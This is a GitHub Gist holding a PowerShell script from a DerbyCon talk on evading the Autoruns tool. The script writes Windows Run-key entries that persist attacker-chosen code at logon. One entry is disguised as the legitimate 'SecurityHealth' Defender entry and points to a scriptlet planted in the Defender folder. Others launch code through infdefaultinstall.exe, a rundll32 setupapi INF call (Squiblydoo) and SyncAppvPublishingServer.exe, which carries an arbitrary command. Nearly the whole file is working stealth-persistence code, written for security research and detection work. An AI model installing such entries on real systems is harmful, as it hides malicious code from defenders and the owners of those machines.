-
-
Save ConsciousHacker/aa8d4eb96005b8ab954b1287787a9be4 to your computer and use it in GitHub Desktop.
DerbyCon Autoruns Talk
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
AutoRuns v1.0 | |
License: GPLv3 | |
Author: @ConsciousHacker | |
Credits: @HuntressLabs | |
References: https://github.com/huntresslabs/evading-autoruns | |
#> | |
function InstallAutoRuns-COM | |
{ | |
#Place your com scriptlet in C:\Program Files\Windows Defender\ as "MSASCuiL.com" | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$FakeProgramName = "SecurityHealth" | |
$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui"' | |
Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString | |
} | |
function UninstallAutoRuns-COM | |
{ | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$FakeProgramName = "SecurityHealth" | |
$ComScriptlet = '"C:\Program Files\Windows Defender\MSASCui.exe"' | |
Set-ItemProperty -Path $Autoruns -Name $FakeProgramName -Value $ComScriptlet -Type ExpandString | |
} | |
function InstallAutoRuns-INFDefaultInstall | |
{ | |
param | |
( | |
[Parameter(Mandatory = $True)] | |
[string]$Path | |
) | |
# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf | |
# TODO: Generate inf file | |
# TODO: param for registry key name | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$infpath = $Path | |
$infdefaultinstall = "INF Default Install" | |
$ComScriptlet = '"C:\Windows\system32\infdefaultinstall.exe ' + $infpath + '"' | |
Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString | |
} | |
function UninstallAutoRuns-INFDefaultInstall | |
{ | |
param | |
( | |
[Parameter(Mandatory = $True)] | |
[string]$Path | |
) | |
# TODO: param for registry key name | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$infpath = $Path | |
$infdefaultinstall = "INF Default Install" | |
Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall | |
} | |
function InstallAutoRuns-SquiblydooINF | |
{ | |
param | |
( | |
[Parameter(Mandatory = $True)] | |
[string]$Path | |
) | |
# Example inf here: https://github.com/huntresslabs/evading-autoruns/blob/master/shady.inf | |
# TODO: Generate inf file | |
# TODO: param for registry key name | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$infpath = $Path | |
$infdefaultinstall = "Squiblydoo" | |
$ComScriptlet = '"C:\Windows\system32\rundll32.exe setupapi,InstallHinfSection ModelsSection 128 ' + $infpath + '"' | |
Set-ItemProperty -Path $Autoruns -Name $infdefaultinstall -Value $ComScriptlet -Type ExpandString | |
} | |
function UninstallAutoRuns-SquiblydooINF | |
{ | |
param | |
( | |
[Parameter(Mandatory = $True)] | |
[string]$Path | |
) | |
# TODO: param for registry key name | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
$infpath = $Path | |
$infdefaultinstall = "Squiblydoo" | |
Remove-ItemProperty -Path $Autoruns -Name $infdefaultinstall | |
} | |
function InstallAutoRuns-SyncAppvPublishing | |
{ | |
param | |
( | |
[Parameter(Mandatory = $True)] | |
[string]$Cmd | |
) | |
$SyncAppvPublishing = '"C:\Windows\system32\SyncAppvPublishingServer.exe".; ' + $Cmd + '""' | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
Set-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing" -Value $SyncAppvPublishing -Type ExpandString | |
} | |
function UninstallAutoRuns-SyncAppvPublishing | |
{ | |
$AutoRuns = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | |
Remove-ItemProperty -Path $Autoruns -Name "SyncAppvPublishing" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment